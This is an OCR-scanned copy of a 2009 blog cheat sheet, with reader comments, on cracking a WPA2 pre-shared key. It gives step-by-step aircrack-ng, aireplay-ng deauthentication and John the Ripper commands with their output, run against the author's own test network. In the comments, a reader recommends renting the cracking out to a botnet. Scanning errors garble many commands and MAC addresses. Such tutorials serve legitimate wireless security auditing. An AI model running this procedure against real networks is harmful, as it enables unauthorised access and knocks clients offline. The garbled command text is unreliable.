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Published February 24, 2009 | • By Corelan Team fcorelancOd3r) 
Basic steps : 

• Put interlace in monitor mode 

• Find wireless network (protected with WPA2 and a Pre Shared Key) 

• Capture all packets 

• Wait until you see a client and deauthenticate the client, so the handshake can be captured 

• Crack the key using a dictionary file (or via John The Ripper) 



I'll use a Dlink DWL-G122 (USB) wireless network interface for this procedure. In backtrack4, this device is recognized as 
wlanO. 

First, put the card in monitor mode : 

noot@bt:~# airmon-ng 

Interface Chipset Driver 

wifie Atheros madwifi-ng 

ath0 Atheros madwifi-ng VAP (parent: wifi0) 

athl Atheros madwifi-ng VAP (parent: wifi0) 

wlane Ralink 2573 USB rt73usb - [phyB] 

root@bt:~# airmon-ng start wlan0 

Interface Chipset Driver 

wifi0 Atheros madwifi-ng 

ath0 Atheros madwifi-ng VAP (parent: wifi0) 

athl Atheros madwifi-ng VAP (parent: wifi0) 

wlan0 Ralink 2573 USB rt73usb - [phy0] 

(monitor mode enabled on mon0) 
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Ok, we can now use interlace monO 



Let's find a wireless network that uses WPA2 / PSK : 

noot@bt:~# airodump-ng mon0 
CH 6 ][ Elapsed: 4 s ][ 2009-02-21 12:57 

BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 

00:19:5B:52:AD:F7 -33 5 0 0 10 54 WPA2 CCMP PSK TestNet 

BSSID STATION PWR Rate Lost Packets Probe 

00:19:5B:52:AD:F7 00 : IC : BF :90 : 5B : A3 -29 0- 1 12 4 TestNet 

Stop airodump-ng and run it again, writing all packets to disk : 

airodump-ng mon0 --channel 10 --bssid 00:19:5B:52:AD:F7 -w /tmp/wpa2 

At this point, you have 2 options : either wait until a client connects and the 4-way handshake is complete, or deauthenticate an 
existing client and thus force it to reassociate. Time is money, so let's force the deauthenticate. We need the bssid of the AP (-a) 
and the mac of a connected client (-c) 

root@bt:~# aireplay-ng -0 1 -a 00: 19 : 5B : 52 : AD: F7 -c 00:1C:BF:90:5B:A3 mon0 
13:04:19 Waiting for beacon frame (BSSID: 00: 19: 5B: 52: AD: F7) on channel 10 
13:04:20 Sending 64 directed DeAuth. STMAC: [00 : IC : BF : 90 : 5B : A3] [67|66 ACKs] 

As a result, airodump-ng should indicate "WPA Handshake:" in the upper ri^t comer 

CH 10 ][ Elapsed: 2 mins ][ 2009-02-21 13:04 ][ WPA handshal<e: 00:19:5B:52:AD:F7 
BSSID PWR RXQ Beacons ttData^ #/s CH MB ENC CIPHER AUTH ESSID 

00:19:5B:52:AD:F7 -33 100 1338 99 0 10 54 WPA2 CCMP PSK TestNet 

BSSID STATION PWR Rate Lost Packets Probe 

00:19:5B:52:AD:F7 00 : IC : BF :90 : 5B : A3 -27 54-54 0 230 

Stop airodump-ng and make sure the files were created properly 

root@bt:/# Is /tmp/wpa2* -al 

-rw-r--r-- 1 root root 35189 2009-02-21 13:04 /tmp/wpa2-01 . cap 
-rw-r--r-- 1 root root 476 2009-02-21 13:04 /tmp/wpa2-01 . csv 
-rw-r--r-- 1 root root 590 2009-02-21 13:04 /tmp/wpa2-01 . kismet . csv 

Form this point forward, you do not need to be anywhere near the wireless network. All cracking will happen offline, so you can 
stop airodump and other processes and even walk away fi'om the AP. In lact, I would suggest to walk away and find yourself a 
cosy place where you can live, eat, sleep, etc. . . . Cracking a WPA2 PSK key is based on bruteforcing, and it can take a very very 
long time. There are 2 ways of bruteforcing : one that is relative^ last but does not guarantee success and one that is very slow, 
but guarantees that you will find the key at some point in time 

The first option is by using a worklist/drstionary file. A lot of these files can be found on the internet (e.g. www.theargon.com or 
on packetstorm (see the archives)), or can be generated with tools such as John The Ripper. Once the wordlist is created, all you 
need to do is run aircrack-ng with the worklist and feed it the .cap fie that contains the WPA2 Handshake. 

So if your wordlist is called word.lst (under /tmp/wordlists), you can run 

aircrack-ng -w /tmp/wordlists/word.lst -b 00:19:5B:52:AD:F7 /tmp/wpa2* . cap 
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The success of cracking the WPA2 PSK key is directly linked to the strength of your password file. In other words, you may get 
lucky and get the key very last, or you may not get the key at aE 

The second method (bruteforcing) will be successM for sure, but it may take ages to complete. Keep in mind, a WPA2 key can 
be up to 64 characters, so in theory you would to build every password combination with all possible character sets and feed them 
into aircrack. If you want to use John The Ripper to create all possible password combinations and feed them into aircrack-ng, this 
is the command to use : 

noot@bt:~# /pentest/password/jtr/john --stdout --incrementaliall | aircracl<-ng -b 00:19:5B:52:AD:F7 -w - /tmp/wpa2* . cap 

(Note : the PSK in my testlab is only 8 characters, contains one uppercase character and 4 numbers). I will post the output when 
the key was cracked, including the time it required to crack the key. 

That's it 



Update :after 20 hours of cracking, the key still has not been found. The system I'm using to crack the keys is not very last, but 
let's look at some lacts : 

8 characters, plain characters (lowercase and uppercase) or digits = each character in the key could has 26+26+10 (62) possible 
combinations. So the maximum number of combinations that need to be checked in the brutelbrce process is 62 * 62 * 62 * 62 * 
62 * 62 * 62 * 62 = 218 340 1 05 584 896 At about 600 keys per second on rry "slow" system, it could take more than 
101083382 hours to find the key (1 1539 year). I have stopped the cracking process as my machine is way too slow to crack the 
key while I'm still alive ... So think about this when doing a WPA2 PSK Audit. 

© 2009, Corelan Team (corelancOd3r) . All rights reserved. 

Facebool< 41 Digg Google Linl<edln StumbleUpon 



Related Posts: 

• Cheatsheet : Cracking WEP with Backtrack 4 and aircrack-ng 

• WPA TKIP cracked in a minute - time to move on to WPA2 

• Backtrack 4 cheat sheet 

• Using DBI for solving Reverse Engineering 1 0 1 - Newbie Contest from eLeamSecurity 

• Reversing 101 - Solving a protection scheme 

• Installing Watobo on BackTrack 5 

• Juniper : Netscreen Remote Dial- UP VPN with AD Radius Authentication and route based VPN / tunnel interlace 

• Building IPSec VPN with Junper Netscreen ScreenOS (CJFV) 

• Creating and installing Izm modules in Backtrack 2 

Posted in OOl Security . Linux and Unix . Networking | Tagged aircrack-ng . airodump-ng . backtrack , b acktrack- 5 - crack- wpa2 - 
without- dictionary , backtrack-to-crack- wpa2 . crack, crack- wpawpa2-psk . hack-wpa-backtrack-4 . how-to-crack- wpa2-with- 
b acktrack- 5 . how-to-hack- wpa2-psk-password . how- to-hack- wpawpa-2-using-backtrack . John the ripper , jfr, linux-cracking- 
wpa-keys- with- kismet , psk. wireless, wpa. wpa handshake . wpa2 . wpa2-psk 

6 Responses to Cheatsheet : Cracking WPA2 PSK with Backtrack 4, aircrack-ng and John The Ripper 



Twitter 3 Redd it 



Like this: |^.^ 



Be the first to like this. 



https://www.corelan.be/indexphp/2009/02/24/cheatsheet-cracking-vvpa2-psk-with-backlrack-4-aircrack-ng-and-john-the-ripper/ 



4/7 



4/17/2014 



Cheatsheet : Cracking WPA2 PSK with Bacl<lracl<4, aircracl<-ng and John The Ripper | Corelan Team 



n 

dellnull says: 

October 7. 2009 at 10:48 

Yeah WPA cracking is slow ;-) So it's better to use wordlists first, and then, if not cracked, use bruteforce mode, 
prefereble in a botnet controlled of you ;-) Let those bot do some work! ! 

n 

Peter Van Eeckhoutte says: 
October 7. 2009 at 11:10 

That's an interesting way of looking at it :-) 

Another technique would be to use the power of a GPU (for example a NVIDIA graphics card) to speed up the cracking 
process : 

httpy/code.google.com/p/pyrit/ 

httpy/pentestit.com/2009/07/28/wireless-security-cracking-gpus/ 

n 

dellnull says: 

October 9. 2009 at 16:45 

Yeah, GPU's much fester, but still this wiU take a long time, like millions of years to walk throu^ the keyspace. I would go 
for a crack on a botnet, maybe combined with GPU when avalible in some of the bots 

n 

Peter Van Eeckhoutte says: 
October 9. 2009 at 18:24 

true - does anyone have a spare botnet somewhere I can use ? :-) 

n 

caxxxolina says: 
March 26. 2010 at 23:12 

hi Peter. 

thank you for this tutorial 

twice or three times you writes "Stop airodump-ng and [...]" 

what do you mean ??? 

do i have to close the active window then ? 

or do ihave to ri^t-cHc over the window and "send signal" something 111 
or do i have to go throu^ your tutorial in a new window ? 
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thank you very much indeed, 
caxxxolina 

n 

Peter Van Eeckhoutte says: 
March 26. 2010 at 23:1 6 

Hi, 

Just press CTRL+C or something, to close the running airodump-ng process 
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